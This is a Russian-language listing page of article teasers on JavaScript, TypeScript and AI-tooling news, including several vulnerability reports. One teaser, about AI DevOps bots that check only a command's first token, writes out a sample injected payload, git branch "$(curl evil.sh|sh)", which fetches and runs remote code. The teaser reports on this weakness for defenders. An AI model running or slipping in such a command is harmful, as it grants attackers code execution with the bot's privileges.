GyaanSetu JavaScript

Экосистема JavaScript и TypeScript.

90 articlesDeep, practical knowledge

Загрузчик моделей Ollama позволяет неавторизованным злоумышленникам красть облачные метаданные через SSRF

Уязвимость SSRF сохраняется в Ollama 0.33.2, так как загрузчик тензорных моделей использует отдельный HTTP-клиент, который обходит защиту от перенаправлений, добавленную для CVE-2026-5530. Это позволяет злоумышленникам перенаправлять процесс загрузки на любой доступный адрес.

JavaScript · 3 мин чтения

Уязвимость DevOps-ботов на базе ИИ: белые списки префиксов позволяют выполнять произвольный код

CVE-2026-22708 показывает, что агенты, проверяющие только первый токен команды, могут быть обмануты вредоносной нагрузкой, скрытой в аргументах (например, git branch "$(curl evil.sh|sh)"), что предоставляет злоумышленникам те же привилегии, что и боту автоматизации.

JavaScript · 4 мин чтения

Anthropic снижает стоимость Claude Fable 5.1 на 45% для повторяющихся циклов агентов

Скидка 45% применяется при многократном использовании одного и того же системного промпта и схемы инструментов, что делает Claude Fable 5.1 особенно привлекательным для автономных рецензентов кода, ботов для сортировки тикетов и других повторяющихся агентских конвейеров.

JavaScript · 3 мин чтения

WebFPGA обеспечивает выполнение TinyML-вывода за 4 мс при 30 мВт — данные не покидают браузер

WebFPGA использует WebUSB API для программирования FPGA Lattice iCE40-UP5K из JavaScript, обеспечивая выполнение TinyML-вывода менее чем за 10 мс при потреблении всего нескольких десятков милливатт и сохранении всех данных на устройстве.

JavaScript · 2 мин чтения

Утечка ключей Stripe привела к мошенническим списаниям и краже данных клиентов у 669 вендоров

Скомпрометированные ключи позволяют злоумышленникам создавать списания, запрашивать счета и собирать персональные данные, что грозит чарджбэками, штрафами и репутационным ущербом. Срочные меры включают блокировку dot-файлов, ротацию всех ключей и перенос секретов в защищенное хранилище.

JavaScript · 4 мин чтения

Vapor Mode в Vue 3.6 отказывается от Virtual DOM и повышает производительность игр

Предстоящий Vapor Mode в Vue 3.6 компилирует однофайловые компоненты в прямые вызовы DOM, исключая этап сравнения (diffing) Virtual DOM. В бенчмарках игр, требующих десятки перерисовок в секунду, это изменение сокращает время рендеринга и уменьшает размер бандлов, хотя в интерфейсах с низкой частотой обновления прирост будет незначительным.

JavaScript · 4 мин чтения

Anthropic потратила $165 тыс. на токены Claude, чтобы переписать Bun на Rust за 11 дней

Инженеры Anthropic использовали 64 параллельных агента Claude Fable 5, чтобы переписать кодовую базу Bun на Rust за 11 дней. Расходы на токены составили $165 тыс., но реальная стоимость, скорее всего, окажется выше, если учесть затраты на вычисления после слияния кода и аудит безопасности.

JavaScript · 3 мин чтения

Claude переводит четыре агентских инструмента в статус GA, устраняя необходимость в beta-заголовках для корпоративных клиентов

С отменой заголовков запросов, доступных только для бета-версии, корпоративные клиенты наконец смогут преодолеть юридические и технические барьеры в области безопасности. Новый режим пакетных действий для инструмента computer-use также обещает снижение задержки и расхода токенов, хотя экономия еще требует подтверждения.

JavaScript · 3 мин чтения

TanStack Table v9 сокращает размер бандла до ~5 КБ благодаря выбору функций

Новая бета-версия позволяет импортировать только необходимые возможности сетки: можно полностью исключить код сортировки, уменьшить объем загрузки примерно до 5 КБ и избежать нагрузки на основной поток, которая ранее снижала показатели INP.

JavaScript · 2 мин чтения

Meteor 3.5 снижает нагрузку на CPU на 9% и удваивает пропускную способность благодаря переходу на uWebSockets.js

В Meteor 3.5 представлен подключаемый транспорт DDP, который можно заменить на uWebSockets.js с помощью переменной окружения DDP_TRANSPORT=uws, что обеспечивает увеличение пропускной способности до 1,6 раза, снижение нагрузки на CPU на 9%, потребления RAM на 11% и сокращение пауз GC на 26% для приложений с интенсивным использованием RPC.

JavaScript · 2 мин чтения

Освоение продвинутого серверного кэширования в Next.js

Освоение продвинутого серверного кэширования в Next.js. Масштабирование приложения Next.js требует большего, чем просто выбор между SSR и SSG. По мере роста объема данных вам потребуется продвинутое кэширование, чтобы сократить…

JavaScript · 3 мин чтения

Отладчик Chrome DevTools замедляет загрузку в Playwright более чем в 20 раз

Когда Coffer подключила отладчик Chrome DevTools через Playwright, скорость их загрузок через fetch упала с 600 Мбит/с до всего лишь 113 Мбит/с — замедление более чем в 20 раз полностью перевернуло результаты их бенчмарков.

JavaScript · 3 мин чтения

Включение SharedArrayBuffer заставило меня отказаться от всех сторонних скриптов

Добавление заголовков COOP и COEP открыло доступ к настоящей многопоточности, но мгновенно заблокировало аналитику, Google Fonts, вставки YouTube и всплывающие окна OAuth, что вынудило меня перенести хостинг ресурсов на собственный сервер и полностью переписать фронтенд.

JavaScript · 4 мин чтения

Уязвимость в WooCommerce Social Login позволяет хакерам захватывать любые аккаунты WordPress

CVE 2026 8457: Обход аутентификации в WooCommerce Social Login. В плагине WooCommerce Social Login от WPWeb Elite обнаружена критическая уязвимость безопасности. Уязвимость имеет оценку CVSS 9.…

JavaScript · 3 мин чтения

Next.js 16.3 добавляет экспериментальный хук useOffline для мгновенного определения состояния сети

Хук возвращает логическое значение, которое обновляется в реальном времени, позволяя мгновенно заменить основное приложение простым сообщением «Вы не в сети» без ожидания ошибки запроса, но сам по себе он не обеспечивает кэширование или фоновую синхронизацию.

JavaScript · 2 мин чтения

Пользователи Claude Code экономят 20–35% на токенах благодаря прокси AWS Bedrock

Разработанный программистом Docker-прокси на базе LiteLLM позволяет CLI Claude Code взаимодействовать с моделью Amazon Nova через Bedrock. Это сохраняет привычный рабочий процесс, сокращая расходы на этапе обучения почти на треть по сравнению с тарифами Anthropic.

JavaScript · 3 мин чтения

Новый движок Sätteri в Astro 7 нарушает работу математических формул, якорей заголовков и пользовательских настроек

Написанный на Rust движок Sätteri в Astro 7 нарушает порядок подсветки синтаксиса и выполнения плагинов, превращая блоки display-math в обычный код, удаляя ID заголовков и незаметно игнорируя дополнительные поля конфигурации, такие как shikiConfig, что вынуждает разработчиков полностью пересматривать свой Markdown-стек.

JavaScript · 3 мин чтения

AGP 9.2.0 удваивает скорость Kotlin Coroutines за счет перезаписи байт-кода R8

Входящий в состав Android Gradle Plugin 9.2.0 инструмент R8 теперь заменяет рефлексивные вызовы AtomicFieldUpdater одной инструкцией Unsafe, что существенно снижает накладные расходы на синхронизацию и обеспечивает примерно двукратное ускорение работы channel, mutex и StateFlow без внесения изменений в исходный код.

JavaScript · 4 мин чтения

SvelteKit добавляет удаленные функции и нативную поддержку TypeScript 6 в релизе мая 2026 года

Обновление мая 2026 года позволяет разработчикам вызывать серверную логику с помощью простого асинхронного вызова, а TypeScript 6 привносит оператор satisfies, ускоренную инкрементальную сборку и более строгую типизацию маршрутов — и всё это без выхода из CLI SvelteKit.

JavaScript · 3 мин чтения